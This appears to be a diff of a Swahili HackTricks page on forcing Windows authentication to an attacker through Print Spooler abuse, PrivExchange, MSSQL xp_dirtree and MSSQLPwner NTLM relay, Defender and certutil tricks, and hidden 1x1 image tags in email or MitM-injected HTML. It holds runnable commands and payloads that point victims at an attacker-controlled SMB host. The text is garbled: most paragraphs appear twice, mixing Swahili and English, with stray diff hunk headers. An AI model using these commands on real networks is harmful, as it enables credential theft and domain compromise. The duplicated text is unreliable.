[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) ni **mkusanyiko** wa **vichocheo vya uthibitishaji wa mbali** vilivyotengenezwa kwa C# kwa kutumia MIDL compiler ili kuepuka utegemezi wa wahusika wengine.
[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) ni **mkusanyiko** wa **triggers za uthibitishaji wa mbali** zilizoandikwa kwa C# kwa kutumia MIDL compiler ili kuepuka utegemezi wa wahusika wengine.
## Spooler Service Abuse
Ikiwa huduma ya _**Print Spooler**_ ime **wezeshwa,** unaweza kutumia baadhi ya akidi za AD zinazojulikana tayari ili **kuomba** kwa seva ya uchapishaji ya Domain Controller **sasisho** kuhusu kazi mpya za uchapishaji na umwambie tu **atumie arifa kwa mfumo fulani**.\
Kumbuka wakati printer inatuma arifa kwa mifumo isiyo ya kawaida, inahitaji **kujiandikisha dhidi** ya **mfumo** huo. Hivyo, mshambuliaji anaweza kufanya huduma ya _**Print Spooler**_ kujiandikisha dhidi ya mfumo wowote, na huduma hiyo itatumia **akaunti ya kompyuta** katika uthibitishaji huu.
Ikiwa huduma ya _**Print Spooler**_ ime **wezeshwa,** unaweza kutumia baadhi ya akidi za AD zinazojulikana tayari ku **omba** server ya uchapishaji ya Domain Controller **sasisho** kuhusu kazi mpya za uchapishaji na umwambie tu **atumie arifa kwa mfumo fulani**.\
Kumbuka wakati printer inatuma arifa kwa mifumo isiyo ya kawaida, inahitaji **kujiuthibitisha dhidi** ya **mfumo** huo. Hivyo, mshambuliaji anaweza kufanya huduma ya _**Print Spooler**_ kujiuthibitisha dhidi ya mfumo wowote, na huduma hiyo itatumia **akaunti ya kompyuta** katika uthibitishaji huu.
### Finding Windows Servers on the domain
Kwa kutumia PowerShell, pata orodha ya masanduku ya Windows. Seva kwa kawaida ni kipaumbele, hivyo hebu tuzingatie hapo:
Kwa kutumia PowerShell, pata orodha ya masanduku ya Windows. Servers kwa kawaida ni kipaumbele, hivyo hebu tuzingatie hapo:
```bash
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
```
### Kutafuta huduma za Spooler zinazot listening
### Finding Spooler services listening
Kwa kutumia toleo lililobadilishwa kidogo la @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), angalia kama Huduma ya Spooler inasikiliza:
Tumia @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) iliyobadilishwa kidogo, angalia kama Spooler Service inasikiliza:
```bash
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
@ -54,7 +54,7 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
```
### Kuunganisha na Delegation Isiyo na Kikomo
Ikiwa mshambuliaji tayari ameathiri kompyuta yenye [Unconstrained Delegation](unconstrained-delegation.md), mshambuliaji anaweza **kufanya printer ithibitishe dhidi ya kompyuta hii**. Kwa sababu ya delegation isiyo na kikomo, **TGT** ya **akaunti ya kompyuta ya printer** itakuwa **imehifadhiwa katika** **kumbukumbu** ya kompyuta yenye delegation isiyo na kikomo. Kwa kuwa mshambuliaji tayari ameathiri mwenyeji huu, ataweza **kurejesha tiketi hii** na kuitumia vibaya ([Pass the Ticket](pass-the-ticket.md)).
Ikiwa mshambuliaji tayari ameathiri kompyuta yenye [Unconstrained Delegation](unconstrained-delegation.md), mshambuliaji anaweza **kufanya printer ithibitishe dhidi ya kompyuta hii**. Kwa sababu ya delegation isiyo na kikomo, **TGT** ya **akaunti ya kompyuta ya printer** itakuwa **imehifadhiwa katika** **kumbukumbu** ya kompyuta yenye delegation isiyo na kikomo. Kwa kuwa mshambuliaji tayari ameathiri mwenyeji huu, ataweza **kuchukua tiketi hii** na kuitumia vibaya ([Pass the Ticket](pass-the-ticket.md)).
## RCP Kulazimisha uthibitisho
@ -62,13 +62,13 @@ Ikiwa mshambuliaji tayari ameathiri kompyuta yenye [Unconstrained Delegation](un
## PrivExchange
Shambulio la `PrivExchange` ni matokeo ya kasoro iliyopatikana katika **kipengele cha `PushSubscription` cha Exchange Server**. Kipengele hiki kinaruhusu server ya Exchange kulazimishwa na mtumiaji yeyote wa kikoa mwenye sanduku la barua kuthibitisha kwa mwenyeji wowote aliyepewa na mteja kupitia HTTP.
Shambulio la `PrivExchange` ni matokeo ya kasoro iliyopatikana katika **kipengele cha `PushSubscription` cha Exchange Server**. Kipengele hiki kinaruhusu server ya Exchange kulazimishwa na mtumiaji yeyote wa kikoa mwenye sanduku la barua kuthibitisha kwa mwenyeji yeyote aliyepewa na mteja kupitia HTTP.
Kwa kawaida, **huduma ya Exchange inafanya kazi kama SYSTEM** na inapewa mamlaka kupita kiasi (hasa, ina **WriteDacl privileges kwenye kikoa kabla ya Sasisho la Jumla la 2019**). Kasoro hii inaweza kutumika kuweza **kupeleka taarifa kwa LDAP na kisha kutoa hifadhidata ya NTDS ya kikoa**. Katika hali ambapo kupeleka kwa LDAP haiwezekani, kasoro hii bado inaweza kutumika kupeleka na kuthibitisha kwa wenyeji wengine ndani ya kikoa. Ufanisi wa shambulio hili unatoa ufikiaji wa haraka kwa Msimamizi wa Kikoa na akaunti yoyote ya mtumiaji wa kikoa iliyoidhinishwa.
Kwa kawaida, **huduma ya Exchange inafanya kazi kama SYSTEM** na inapewa mamlaka kupita kiasi (hasa, ina **WriteDacl privileges kwenye kikoa kabla ya Sasisho la Jumla la 2019**). Kasoro hii inaweza kutumika kuweza **kupeleka taarifa kwa LDAP na kisha kutoa hifadhidata ya NTDS ya kikoa**. Katika hali ambapo kupeleka kwa LDAP haiwezekani, kasoro hii bado inaweza kutumika kupeleka na kuthibitisha kwa wenyeji wengine ndani ya kikoa. Ufanisi wa shambulio hili unatoa ufikiaji wa haraka kwa Msimamizi wa Kikoa kwa akaunti yoyote ya mtumiaji wa kikoa iliyoidhinishwa.
## Ndani ya Windows
Ikiwa tayari uko ndani ya mashine ya Windows unaweza kulazimisha Windows kuungana na server kwa kutumia akaunti zenye mamlaka na:
Ikiwa tayari uko ndani ya mashine ya Windows unaweza kulazimisha Windows kuungana na server kwa kutumia akaunti zenye mamlaka kwa:
### Defender MpCmdRun
```bash
@ -78,6 +78,17 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
```sql
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
```
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
```
Au tumia mbinu hii nyingine: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
### Certutil
@ -90,7 +101,7 @@ certutil.exe -syncwithWU \\127.0.0.1\share
### Via email
Ikiwa unajua **anwani ya barua pepe** ya mtumiaji anayeingia ndani ya mashine unayotaka kuathiri, unaweza tu kumtumia **barua pepe yenye picha ya 1x1** kama
If you know the **email address** of the user that logs inside a machine you want to compromise, you could just send him an **email with a 1x1 image** such as
```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
```
@ -98,7 +109,7 @@ na wakati anafungua, atajaribu kuthibitisha.
### MitM
Ikiwa unaweza kufanya shambulio la MitM kwa kompyuta na kuingiza HTML kwenye ukurasa atakaouona, unaweza kujaribu kuingiza picha kama ifuatavyo kwenye ukurasa:
Ikiwa unaweza kufanya shambulio la MitM kwa kompyuta na kuingiza HTML kwenye ukurasa atakaouona unaweza kujaribu kuingiza picha kama ifuatavyo kwenye ukurasa:
```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
```
@ -108,16 +119,16 @@ Ikiwa unaweza kukamata [NTLMv1 challenges soma hapa jinsi ya kuzivunja](../ntlm/
_Kumbuka kwamba ili kuvunja NTLMv1 unahitaji kuweka changamoto ya Responder kuwa "1122334455667788"_
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}